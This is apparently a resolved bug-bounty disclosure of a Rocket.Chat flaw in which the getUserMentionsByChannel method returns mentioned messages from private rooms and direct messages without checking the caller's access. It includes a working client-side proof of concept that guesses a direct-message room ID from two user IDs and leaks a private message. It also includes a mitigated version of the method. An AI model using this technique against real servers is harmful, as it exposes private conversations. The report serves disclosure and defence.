
getUserMentionsByChannel leaks messages with mention from private channel

High
Rocket.Chat

Team Summary

Official summary from Rocket.Chat

## Summary

The `getUserMentionsByChannel` Meteor server method discloses messages from private channels and direct messages regardless of the user's access permission to the room.

## Description

When calling the `getUserMentionsByChannel` method, the server does not check the user's access to the given room and returns all messages the user has been mentioned in.

```javascript
Meteor.call(
  "getUserMentionsByChannel",
  { roomId: "<TARGET_ROOM>" },
  console.log
);
```

The issue was found in [app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23](https://github.com/RocketChat/Rocket.Chat/blob/194a600f31a1037716ac4de297cfff0b8a4f9942/app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23), where `roomId` is verified to be a String only.

```javascript
Meteor.methods({
  getUserMentionsByChannel({ roomId, options }) {
    check(roomId, String);
    if (!Meteor.userId()) {
      throw new Meteor.Error('error-invalid-user', 'Invalid user', { method: 'getUserMentionsByChannel' });
    }
    // Only existence of the room is verified; the caller's access to it is not.
    const room = Rooms.findOneById(roomId);
    if (!room) {
      throw new Meteor.Error('error-invalid-room', 'Invalid room', { method: 'getUserMentionsByChannel' });
    }
    const user = Users.findOneById(Meteor.userId());
    return Messages.findVisibleByMentionAndRoomId(user.username, roomId, options).fetch();
  },
});
```

The server will return all messages the requesting user has been @-mentioned in.

## Releases Affected

* `4.1.2`
* `3.18.3`
* First [99065f7518bc88341210c0e38678bc3c97e3b58a](https://github.com/RocketChat/Rocket.Chat/blob/99065f7518bc88341210c0e38678bc3c97e3b58a/packages/rocketchat-mentions/server/methods/getUserMentionsByChannel.js) (12.03.2018)

## Steps To Reproduce (from initial installation to vulnerability)

1. Log in to Rocket.Chat
2. Obtain a room ID
   1. Guess the direct message `roomId` from user IDs
   2. Leak a private message ID with an unknown vulnerability
3. Call `getUserMentionsByChannel` with the given `{ roomId: "<Value>" }`
4. Read the messages in which the current user was mentioned from the `console.log` output

## Supporting Material/References

The following example leaks a private message between two users to a third account, `trudy`, who performs the requests from the authenticated client, disclosing a direct message between `alice` and `bob`.

```javascript
Meteor.user().username
// > 'trudy'

let alice = 'kYfzDMQLyPFjS9ASb';
let bob = 'zZnrfd2RvcWhspr6S';

Meteor.call(
  "getUserMentionsByChannel",
  { roomId: `${alice}${bob}` }, // direct message channel
  (err, data) => console.log(
    data
      .map((m) => `${m._id} ${m.u.username} (${m.ts.toGMTString()}): ${m.msg}`)
      .join("\n")
  )
);
// > Yp6NoMZk34mnQZiBR alice (Thu, 25 Nov 2021 14:17:25 UTC): Mention @trudy somewhere

// The regular message method enforces room access on the very same message.
Meteor.call("getMessages", ["Yp6NoMZk34mnQZiBR"], (err, data) => console.log(err.message))
// > Not allowed [error-not-allowed]
```

## Suggested mitigation

* Check for permission to read messages from the room given in the `{ roomId }` method argument.

## Impact

Authenticated users can disclose all messages they were mentioned in from private channels and direct messages they should not have access to.

## Fixed in

We have fixed this issue in version 5.0.
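The suggested mitigation, shown as an added self-contained example that is not Rocket.Chat's code: the vulnerable method shape from the report next to a hardened one that rejects callers who cannot read the room. The collections, the `mentions` field and the `canAccessRoom()` helper are constructed stand-ins for the real ones; usernames are used in place of user IDs to keep the model small.

```javascript
// Added example, not Rocket.Chat's code: a model of the missing room-access
// check. Room types follow Rocket.Chat's convention ('c' public channel,
// 'p' private group, 'd' direct message); collections and canAccessRoom()
// are constructed stand-ins.
const ALICE_BOB_DM = 'kYfzDMQLyPFjS9ASbzZnrfd2RvcWhspr6S'; // DM room id from the report

const rooms = {
  [ALICE_BOB_DM]: { _id: ALICE_BOB_DM, t: 'd' },
  general: { _id: 'general', t: 'c' },
};
// Membership (subscriptions): trudy is not a member of the alice/bob DM.
const subscriptions = [
  { rid: ALICE_BOB_DM, username: 'alice' },
  { rid: ALICE_BOB_DM, username: 'bob' },
  { rid: 'general', username: 'trudy' },
];
// Constructed messages; `mentions` lists the @-mentioned usernames.
const messages = [
  { _id: 'Yp6NoMZk34mnQZiBR', rid: ALICE_BOB_DM, u: { username: 'alice' },
    msg: 'Mention @trudy somewhere', mentions: ['trudy'] },
  { _id: 'msg2', rid: 'general', u: { username: 'bob' },
    msg: 'hi @trudy', mentions: ['trudy'] },
];

function findVisibleByMentionAndRoomId(username, roomId) {
  return messages.filter((m) => m.rid === roomId && m.mentions.includes(username));
}

// Hypothetical access rule: public channels are readable by any logged-in
// user; private groups and direct messages only by their members.
function canAccessRoom(room, username) {
  if (room.t === 'c') return true;
  return subscriptions.some((s) => s.rid === room._id && s.username === username);
}

// Shape of the vulnerable method: the room must exist, nothing more.
function getUserMentionsVulnerable(username, roomId) {
  const room = rooms[roomId];
  if (!room) throw new Error('error-invalid-room');
  return findVisibleByMentionAndRoomId(username, roomId);
}

// Mitigated shape: refuse the call when the requester cannot read the room.
function getUserMentionsFixed(username, roomId) {
  const room = rooms[roomId];
  if (!room) throw new Error('error-invalid-room');
  if (!canAccessRoom(room, username)) throw new Error('error-not-allowed');
  return findVisibleByMentionAndRoomId(username, roomId);
}
```

With this model `getUserMentionsVulnerable('trudy', ALICE_BOB_DM)` returns alice's DM message, while `getUserMentionsFixed` throws `error-not-allowed` for the same call and still serves trudy's mentions in the public `general` channel.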

Reported by gronke

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Information Disclosure